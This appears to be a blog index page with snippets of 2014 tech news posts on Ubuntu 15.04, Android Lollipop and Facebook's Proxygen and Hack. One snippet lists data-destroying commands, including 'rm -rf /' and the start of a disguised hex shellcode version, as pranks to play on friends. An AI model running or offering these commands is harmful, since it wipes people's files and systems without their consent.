Skip to main content

Posts

Ubuntu 15 release schedule

Ubuntu 15.04 which is codenamed Vivid Vervet has already gone in development. A tentative release schedule of Ubuntu 15.04 is out which says it will be released on 23 April 2015. Now this is again interesting. Windows 10 which has taken plenty of features from Linux, is supposed to be released around mid next year. I have a tentative feeling that it could be in April 2015. This is because Windows 8 was released one week after Ubuntu 12.10 while Windows 8.1 and Ubuntu 13.10 were released on the same date of 17 October 2013. Anyways, let’s have a look at Ubuntu 15.04 Release dates. Ubuntu 15.04 release schedule Alpha 1 – December 18th  Alpha 2 – January 22nd  Feature Freeze – February 19th  Beta 1 – February 28th  UI Freeze – March 12th  Final Beta – March 26th  Kernel Freeze – April 9th  Release Candidate – April 16th  Final Release – April 23rd That concludes Ubuntu 15.04 rel...

Google Unveils Android Lollipop Source Code

Android 5 Source -Code Revealed Google has now officially completed the launch of the latest Android version by releasing the source code in Android Open Source Project (ASOP). The IT giant has unveiled all Android 5.0 code at its official Git webpage, ( Check here ), and source codes are now absolute ready for the manufacturers and custom ROM developers.   Android 5.0, Android 5.0 source code, Android 5.0 Lollipop, Google, Google Android 5.0 Lollipop release, Android, Android version release  Google has made the Android 5.0 code available as a part of android/platform build/lollipop-release branch with the build number of “LRX21M”. It has also added the device repositories for the new Nexus devices including Nexus Player, Nexus 6 and Nexus 9.  Along with that, the Android team has also shared a new documentation for Lollipop release, which would assist the developers about how to go with it. The Android Building Google Group post regarding the same ca...

Superb Linux Commands To do Fun With.

Dangerous Linux Commands To Play :) Don't ever Run These Commands on Your Linux Desktop...... Ahh  well you can Try on Your Friends Linux Destro :) 1. rm -rf / Deletes everything including files on your hard drive and files on connected removable media devices. rm – Remove the following files. -rf – Run rm recursively and force-remove all files without prompting you. / – Tells rm to start at the root directory, which contains all the files on your computer and all mounted media devices,  including remote file shares and removable drives. 2. Disguised rm –rf / Actually, the hex version of rm –rf / – wipes out your files just as if you had run rm –rf /. char esp[] __attribute__ ((section(“.text”))) /* e.s.p release */ = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68" "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99" "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7" "\x56\x04\xf7\x56\...

Facebook Open Sources Its Proxygen HTTP Framework And Server

Facebook Open Sources Its Proxygen HTTP Framework And Server Looks like Facebook is still continuing Open-Sourcing some of its internal Usage Codes lets get an deeper image of it. The earlier day Facebook that it is Open Sourcing its Proxygen & HTTP framework And Server.As earlier it has already Open sourced many of its Current using Technologies and now Open Sourcing these which gives an keen interest for Web-Application & Mobile Developers. Well Speaking of Proxygen its: A collection of C++ HTTP libraries including an easy to use HTTP server. You Can get the Source code of Proxygen from here . 

Facebook Introduces New Programming Language Hack

New Programming Named Hack According to sources Facebook  has released a new programming language named "Hack". According to Facebook   Hack is: " Hack is a programming language for HHVM that interoperates seamlessly with PHP. Hack reconciles the fast development cycle of PHP with the discipline provided by static typing, while adding many features commonly found in other modern programming languages. Hack provides instantaneous type checking via a local server that watches the filesystem. It typically runs in less than 200 milliseconds, making it easy to integrate into your development workflow without introducing a noticeable delay. The following are some of the important language features of Hack . For more information, see the full documentation , or follow through the quick i nteractive tutorial ."

Android Lollipop 7 Concepts & Things

7 Things about Android Lollipop After offering chocolate ( Kit-Kat ), now Google is ready to serve you Lollipops. Google on Wednesday finally revealed the official name of its next version Android L —  Android 5.0 Lollipop . The newly released  Android 5.0 Lollipop  ships with the latest Motorola-made Nexus 6 smartphone and Nexus 9 tablet built by HTC, but the company did not make the Lollipop available for download to other users immediately. The older versions of Nexus devices will receive the Lollipop update in the coming weeks. Lollipop features some significant changes to the Android platform with a sleek new user interface, cross platform support and improved performance via the new ART runtime engine. The operating system also offers better battery life, improved notifications, OpenGL ES 3.1 and 64-bit support, among other features. Here are some most notable features of  Android 5.0 Lollipop , along with some insight as to when you might b...